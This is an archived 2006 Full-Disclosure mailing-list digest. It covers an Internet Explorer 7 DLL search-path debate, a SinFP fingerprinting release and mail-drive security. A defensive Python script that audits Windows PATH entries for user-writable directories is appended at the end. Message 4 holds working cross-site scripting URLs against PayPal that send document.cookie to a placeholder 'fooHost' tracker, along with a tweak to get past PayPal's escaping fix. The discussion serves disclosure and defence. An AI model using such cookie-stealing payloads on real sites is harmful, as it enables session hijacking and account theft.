Full Disclosure mailing list archives
help
From: Fig <digital.figlet () gmail com>
Date: Mon, 6 Nov 2006 13:08:59 -0500
help

On 11/6/06, full-disclosure-request () lists grok org uk <full-disclosure-request () lists grok org uk> wrote:

Send Full-Disclosure mailing list submissions to
full-disclosure () lists grok org uk

To subscribe or unsubscribe via the World Wide Web, visit
https://lists.grok.org.uk/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
full-disclosure-request () lists grok org uk

You can reach the person managing the list at
full-disclosure-owner () lists grok org uk

When replying, please edit your Subject line so it is more specific than "Re: Contents of Full-Disclosure digest..."

Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you.

Today's Topics:

1. Re: Internet Explorer 7 - Still Spyware Writers' Heaven (Joshua Gimer)
2. SinFP 2.04 release, works under Windows (GomoR)
3. Re: Mail Drives Security Considerations (gabriel rosenkoetter)
4. Re: alert() (Matthew Flaschen)
5. Re: Mail Drives Security Considerations (Darkz)
6. Re: Internet Explorer 7 - Still Spyware Writers' Heaven (Roger A. Grimes)

----------------------------------------------------------------------

Message: 1
Date: Sat, 4 Nov 2006 13:15:35 -0700
From: "Joshua Gimer" <jgimer () gmail com>
Subject: Re: [Full-disclosure] Internet Explorer 7 - Still Spyware Writers' Heaven
To: "Eliah Kagan" <degeneracypressure () gmail com>
Cc: full-disclosure () lists grok org uk, bugtraq () securityfocus com
Message-ID: <cf939bff0611041215u28faffd5j211562633f7a9b3d () mail gmail com>
Content-Type: text/plain; charset="iso-8859-1"

If Microsoft is not planning on providing a fix for this until Vista, I can see a worm coming from this.

Forgive me if I don't know how this works in the Windows world, but when it is looking for this DLL, does it take the first one that it finds within your path, like in UNIX? Or does it look in all directories within your path and then decide? I am guessing the former, but I am just clarifying.

On 11/3/06, Eliah Kagan <degeneracypressure () gmail com> wrote:
On 11/2/06, Roger A. Grimes wrote:
So, if your statement is accurate that malware would need to be placed in a directory identified by the PATH statement, we can relax because that would require Administrator access to pull off. Admin access would be needed to modify the PATH statement appropriately to include the user's desktop or some other new user-writable location, or Admin access would be needed to copy a file into the locations indicated by the default PATH statement.

It would not require *administrator* access--non-administrator users can still add things to their own PATHs, just not to the universal, system PATH. (See Control Panel > System > Advanced > Environment Variables.)

-Eliah

--
Thx
Joshua Gimer
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061104/b97c9d1d/attachment-0001.html

------------------------------

Message: 2
Date: Sun, 5 Nov 2006 20:02:28 +0100
From: GomoR <fd () gomor org>
Subject: [Full-disclosure] SinFP 2.04 release, works under Windows
To: full-disclosure () lists grok org uk
Message-ID: <20061105190228.GD23011 () oshima enslaved lan>
Content-Type: text/plain; charset=us-ascii

Hi,

I'm pleased to announce the availability of SinFP 2.04, which now can run under Windows ActivePerl.

SinFP is a new approach to active and passive OS fingerprinting; you can learn more about its features here:
http://www.gomor.org/sinfp

SinFP now has more than 130 signatures in its database. To be informed about new signature files, subscribe to:
http://lists.sourceforge.net/lists/listinfo/sinfp-discuss

Installation instructions can be found here:
http://www.gomor.org/cgi-bin/index.pl?mode=view;page=sinfp#3

For Windows users, follow these instructions. This was tested with ActivePerl 5.8.8.819, with PPM v4.0.

# If you are behind a proxy:
C:\> set http_proxy=http://username:password@proxy:port

# Add gomor repository
C:\> ppm repo add gomor http://www.gomor.org/files/ppm/repo-8xx

# Disable all other repos, if you have many, or only the ActiveState repo
# by default
C:\> ppm repo 1 off
...

C:\> ppm install Net-SinFP

# Re-enable all other repos
C:\> ppm repo 1 on
...

Launch it:
C:\> perl C:\perl\site\bin\sinfp.pl

If you have error messages about failing to load some .dll, go to www.microsoft.com. Then, in the search field, type in vcredist_x86.exe, download it and install it.

Please, do not hesitate to submit new signatures to sinfp_at_gomor.org, or on the mailing list.

Best regards,

--
   ^  ___  ___             http://www.GomoR.org/  <-+
   | / __ |__/  Systems & Security Engineer        |
   | \__/ |  \  ---[ zsh$ alias psed='perl -pe ' ]--- |
   +--> Net::Packet <=> http://search.cpan.org/~gomor/ <--+

------------------------------

Message: 3
Date: Sun, 5 Nov 2006 18:18:10 -0500
From: gabriel rosenkoetter <gr () eclipsed net>
Subject: Re: [Full-disclosure] Mail Drives Security Considerations
To: full-disclosure () lists grok org uk
Message-ID: <20061105231810.GD36176 () stow eclipsed net>
Content-Type: text/plain; charset="us-ascii"

On Fri, Nov 03, 2006 at 11:28:27AM -0500, Matthew Flaschen wrote:
Why can't message signing offer backwards compatibility (assuming you use multipart/signed)?

Seems to me that adding a PGP signature verification to every operation on files (even ls(1); you have to check to make sure it's not a spoofed file) would rather noticeably impact the performance of what's already got to be pretty slow on most users' connections, and it adds a layer of complexity to the setup (you have to generate the key pair, and have the private key available on any system which you intend to have write access), but that would certainly work. Spam will still be a DoS against storage space, of course.

Never mind that this software violates gmail's acceptable use policy and is transmitted back and forth in the clear (unless you want to roll PGP encryption into the mix, in which case keeping paths in the clear in the subject breaks the security), so it'd be hard to view data stored this way as being "secure" to begin with...

--
gabriel rosenkoetter
gr () eclipsed net
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061105/669fedd5/attachment-0001.bin

------------------------------

Message: 4
Date: Sun, 05 Nov 2006 22:24:25 -0500
From: Matthew Flaschen <matthew.flaschen () gatech edu>
Subject: Re: [Full-disclosure] alert()
To: Matthew Flaschen <matthew.flaschen () gatech edu>
Cc: full-disclosure () lists grok org uk, spoof () paypal com
Message-ID: <454EAAE9.9030500 () gatech edu>
Content-Type: text/plain; charset="iso-8859-1"

Hmm, I got an email from Paypal, saying "Thank you for bringing this incident of suspicious activity to our attention. PayPal will investigate this activity immediately and contact you further if any additional information is required.[...]"

I'm fairly certain they're referring to this exploit, which I CCed them on in my previous post.

Also, the POC I posted no longer works. It looks like Paypal is no longer unescaping double quotation marks. Thus, the script fails to append the cookie. At any rate, just changing the double quotes to single quotes makes the POC work again:

https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey-outside&voice=javascript:window.location='http://fooHost/tracker.php?'%2Bdocument.cookie

Matt Flaschen

Matthew Flaschen wrote:
Good find. How about using it to steal the entire PayPal cookie, though:

https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey-outside&voice=javascript:window.location=%22http://fooHost/tracker.php?%22%2Bdocument.cookie;

auto113922 () hush ai wrote:
https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey-outside&voice=javascript:document.write('heh');alert('bl00p');

Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
------------------------------------------------------------------------

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 250 bytes
Desc: OpenPGP digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061105/e53d7a03/attachment-0001.bin

------------------------------

Message: 5
Date: Mon, 06 Nov 2006 10:36:10 +0200
From: Darkz <darkz.gsa () gmail com>
Subject: Re: [Full-disclosure] Mail Drives Security Considerations
To: Matthew Flaschen <matthew.flaschen () gatech edu>, full-disclosure () lists grok org uk
Message-ID: <454EF3FA.6040409 () gmail com>
Content-Type: text/plain; charset="us-ascii"

An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061106/76d0ca99/attachment-0001.html

------------------------------

Message: 6
Date: Sun, 5 Nov 2006 22:35:25 -0500
From: "Roger A. Grimes" <roger () banneretcs com>
Subject: Re: [Full-disclosure] Internet Explorer 7 - Still Spyware Writers' Heaven
To: "Eliah Kagan" <degeneracypressure () gmail com>, <full-disclosure () lists grok org uk>, <bugtraq () securityfocus com>
Message-ID: <096A04F511B7FD4995AE55F13824B8331983BB () banneretcs1 local banneretcs com>
Content-Type: text/plain; charset="us-ascii"

So all the malware writer has to do now is figure out how to do the initial exploit in the first place, that would then allow them to muck with path statements or place code in path executable areas.

I mean, do you get it, yet? If the malware writer figures out how to do the initial exploit, anything can be done, not just the path tricks. My WhereWindowsMalwareHides document (http://weblog.infoworld.com/securityadviser/archives/2006/05/updated_where_w.html) contains over 145 different tricks and locations where malware can hide and live, along with the path trick.

Your point is a valid point, but it's been a known issue for years. You can't skip over the hardest part, the initial exploit, and start picking on one of over a hundred ways to muck with Windows users and call "IE 7 a Spyware Writer's Heaven". I mean you can, but it looks like you're grasping at straws. At least tell us something new, and not something that's been documented for years.

Roger

-----Original Message-----
From: Eliah Kagan [mailto:degeneracypressure () gmail com]
Sent: Friday, November 03, 2006 9:26 PM
To: full-disclosure () lists grok org uk; bugtraq () securityfocus com
Subject: Re: Internet Explorer 7 - Still Spyware Writers' Heaven

On 11/2/06, Roger A. Grimes wrote:
So, if your statement is accurate that malware would need to be placed in a directory identified by the PATH statement, we can relax because that would require Administrator access to pull off. Admin access would be needed to modify the PATH statement appropriately to include the user's desktop or some other new user-writable location, or Admin access would be needed to copy a file into the locations indicated by the default PATH statement.

It would not require *administrator* access--non-administrator users can still add things to their own PATHs, just not to the universal, system PATH. (See Control Panel > System > Advanced > Environment Variables.)

-Eliah

------------------------------

End of Full-Disclosure Digest, Vol 21, Issue 9
**********************************************
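Messages 1 and 6 of the quoted digest turn on two facts: a library loaded by name is taken from the first directory in the search order that contains it, and a standard user can append directories to their own PATH (which Windows places after the system PATH). The practical check for a defender is therefore which PATH entries a non-admin user can write to and where they sit in the order. The script below is an added example and is not code from any of the posters; it parses a Windows-style PATH, flags relative entries and entries the current user can write to, and shows the first-match resolution. The sample PATH and the set of writable directories are constructed for illustration so the logic runs offline; on a real Windows host, pass `os.environ["PATH"]` and the `probe_writable` predicate, which creates and deletes a temporary file because `os.access()` does not consult the ACL on Windows.

```python
"""Audit a Windows-style PATH for entries a non-admin user could write to.

Added example (not from the digest posters). Directory layout and writability
are supplied by the caller so the parsing and ranking logic runs on any OS.
"""
import ntpath
import os
import tempfile
from typing import Callable, Dict, List, Optional

# Constructed sample PATH (not from the page): a user-owned tools directory,
# a relative entry, and a duplicate of C:\Windows.
SAMPLE_PATH = (
    r"C:\Windows\system32;C:\Windows;"
    r"C:\Users\alice\AppData\Local\Tools;"
    r"tools\bin;"
    r"C:\Windows;"
    r"C:\Program Files\Vendor\bin"
)

# Constructed: the one directory in SAMPLE_PATH a standard user owns.
SAMPLE_WRITABLE = {r"c:\users\alice\appdata\local\tools"}


def _key(entry: str) -> str:
    """Case-folded, slash-normalised form used for de-duplication."""
    return ntpath.normcase(entry).rstrip("\\")


def split_path(path_value: str, sep: str = ";") -> List[str]:
    """Split PATH, expand %VAR% references, drop empty and duplicate entries.

    Order is preserved because order decides which copy of a name wins.
    """
    seen = set()
    entries: List[str] = []
    for raw in path_value.split(sep):
        entry = ntpath.expandvars(raw.strip().strip('"'))
        if not entry:
            continue
        k = _key(entry)
        if k in seen:
            continue
        seen.add(k)
        entries.append(entry)
    return entries


def probe_writable(directory: str) -> bool:
    """Try to create and remove a temp file: the reliable test on Windows."""
    try:
        with tempfile.NamedTemporaryFile(dir=directory):
            pass
        return True
    except OSError:
        return False


def sample_writable(directory: str) -> bool:
    """Constructed stand-in for probe_writable() so the example runs offline."""
    return _key(directory) in SAMPLE_WRITABLE


def audit_path(path_value: str,
               is_writable: Callable[[str], bool] = probe_writable,
               sep: str = ";") -> List[Dict[str, object]]:
    """Return findings in search order: relative entries (they resolve against
    the current directory) and entries the current user can write to."""
    findings: List[Dict[str, object]] = []
    for position, entry in enumerate(split_path(path_value, sep)):
        if not ntpath.isabs(entry):
            findings.append({"position": position, "entry": entry, "issue": "relative"})
        elif is_writable(entry):
            findings.append({"position": position, "entry": entry, "issue": "writable"})
    return findings


def resolve_first_match(name: str, directories: List[str],
                        has_file: Callable[[str, str], bool]) -> Optional[str]:
    """First-match resolution: the first directory holding `name` wins, so an
    earlier writable directory shadows a later trusted one."""
    for directory in directories:
        if has_file(directory, name):
            return directory
    return None


if __name__ == "__main__":
    # Live run: real PATH, real writability probe (only meaningful on Windows).
    for finding in audit_path(os.environ.get("PATH", ""), probe_writable, os.pathsep):
        print(f"[{finding['issue']}] #{finding['position']}: {finding['entry']}")
```

The position in the findings matters more than the count: a writable directory reported at position 2 sits ahead of every directory after it, so any name it contains shadows the same name further down. Reviewing the user PATH of accounts on a shared host with this check is a straightforward hardening step that needs no change to the system PATH.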